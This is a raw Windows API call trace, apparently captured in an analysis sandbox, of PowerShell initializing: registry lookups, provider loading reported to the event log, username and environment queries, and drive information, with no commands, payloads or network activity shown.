	[0354.055] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.056] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x374) returned 0x0
	[0354.056] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.056] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x378) returned 0x0
	[0354.056] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x37c) returned 0x0
	[0354.056] RegCloseKey (hKey=0x37c) returned 0x0
	[0354.056] RegCloseKey (hKey=0x358) returned 0x0
	[0354.056] RegCloseKey (hKey=0x378) returned 0x0
	[0354.060] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b880008
	[0354.215] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e3ff48*="WSMan", lpRawData=0x2e3fcb8) returned 1
	[0354.216] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.216] CoTaskMemFree (pv=0x436a00) 
	[0354.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.218] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.218] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.219] CoTaskMemFree (pv=0x1b750480) 
	[0354.219] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.219] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.219] CoTaskMemFree (pv=0x40c280) 
	[0354.219] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e45928*="Alias", lpRawData=0x2e456b8) returned 1
	[0354.220] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.220] CoTaskMemFree (pv=0x436a00) 
	[0354.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.222] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.222] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.222] CoTaskMemFree (pv=0x1b750480) 
	[0354.222] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.223] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.223] CoTaskMemFree (pv=0x40c280) 
	[0354.223] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e4af20*="Environment", lpRawData=0x2e4acb0) returned 1
	[0354.224] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.224] CoTaskMemFree (pv=0x436a00) 
	[0354.225] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.225] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0354.225] CoTaskMemFree (pv=0x436a00) 
	[0354.225] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.225] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0354.225] CoTaskMemFree (pv=0x436a00) 
	[0354.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0354.225] SetErrorMode (uMode=0x1) returned 0x1
	[0354.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0354.225] SetErrorMode (uMode=0x1) returned 0x1
	[0354.227] GetLogicalDrives () returned 0x4
	[0354.227] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.228] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0354.228] SetErrorMode (uMode=0x1) returned 0x1
	[0354.229] CoTaskMemAlloc (cb=0x68) returned 0x46f370
	[0354.229] CoTaskMemAlloc (cb=0x68) returned 0x46ef80
	[0354.229] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x46f370, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd6d0, lpMaximumComponentLength=0x1cd6cc, lpFileSystemFlags=0x1cd6c8, lpFileSystemNameBuffer=0x46ef80, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd6d0*=0x9c354b42, lpMaximumComponentLength=0x1cd6cc*=0xff, lpFileSystemFlags=0x1cd6c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0354.229] CoTaskMemFree (pv=0x46f370) 
	[0354.229] CoTaskMemFree (pv=0x46ef80) 
	[0354.230] SetErrorMode (uMode=0x1) returned 0x1
	[0354.230] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0354.230] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd410, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.230] SetErrorMode (uMode=0x1) returned 0x1
	[0354.230] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd670 | out: lpFileInformation=0x1cd670*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0354.230] SetErrorMode (uMode=0x1) returned 0x1
	[0354.230] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd410, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.230] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0354.231] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0354.231] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.231] SetErrorMode (uMode=0x1) returned 0x1
	[0354.231] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd4a0 | out: lpFileInformation=0x1cd4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0354.232] SetErrorMode (uMode=0x1) returned 0x1
	[0354.232] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.232] SetErrorMode (uMode=0x1) returned 0x1
	[0354.232] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd4a0 | out: lpFileInformation=0x1cd4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0354.232] SetErrorMode (uMode=0x1) returned 0x1
	[0354.232] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0354.232] SetErrorMode (uMode=0x1) returned 0x1
	[0354.232] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd540 | out: lpFileInformation=0x1cd540*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0354.233] SetErrorMode (uMode=0x1) returned 0x1
	[0354.233] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.233] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.233] CoTaskMemFree (pv=0x1b750480) 
	[0354.233] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.233] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.234] CoTaskMemFree (pv=0x40c280) 
	[0354.234] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e52010*="FileSystem", lpRawData=0x2e51da0) returned 1
	[0354.235] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.235] CoTaskMemFree (pv=0x436a00) 
	[0354.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.237] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.237] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.237] CoTaskMemFree (pv=0x1b750480) 
	[0354.237] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.237] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.237] CoTaskMemFree (pv=0x40c280) 
	[0354.237] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e57850*="Function", lpRawData=0x2e575e0) returned 1
	[0354.238] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.238] CoTaskMemFree (pv=0x436a00) 
	[0354.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.583] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.583] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.584] CoTaskMemFree (pv=0x1b750480) 
	[0354.584] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.584] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.584] CoTaskMemFree (pv=0x40c280) 
	[0354.584] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e89ae0*="Registry", lpRawData=0x2e89870) returned 1
	[0354.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.717] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.717] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.717] CoTaskMemFree (pv=0x1b750480) 
	[0354.717] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.717] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.718] CoTaskMemFree (pv=0x40c280) 
	[0354.718] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e8eef8*="Variable", lpRawData=0x2e8ec88) returned 1
	[0354.718] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.718] CoTaskMemFree (pv=0x436a00) 
	[0354.718] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0354.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.719] CoTaskMemFree (pv=0x436a00) 
	[0354.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0354.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0354.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0354.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0354.985] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0354.985] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0354.986] CoTaskMemFree (pv=0x1b750480) 
	[0354.986] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.986] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0354.986] CoTaskMemFree (pv=0x40c280) 
	[0354.986] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea2b10*="Certificate", lpRawData=0x2ea28a0) returned 1
	[0355.101] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.101] CoTaskMemFree (pv=0x436a00) 
	[0355.103] GetLogicalDrives () returned 0x4
	[0355.103] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0355.103] CoTaskMemAlloc (cb=0x20e) returned 0x440800
	[0355.103] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x440800 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0355.103] CoTaskMemFree (pv=0x440800) 
	[0355.105] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.105] CoTaskMemFree (pv=0x436a00) 
	[0355.105] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.105] CoTaskMemFree (pv=0x436a00) 
	[0355.115] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.115] CoTaskMemFree (pv=0x436a00) 
	[0355.117] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.117] CoTaskMemFree (pv=0x436a00) 
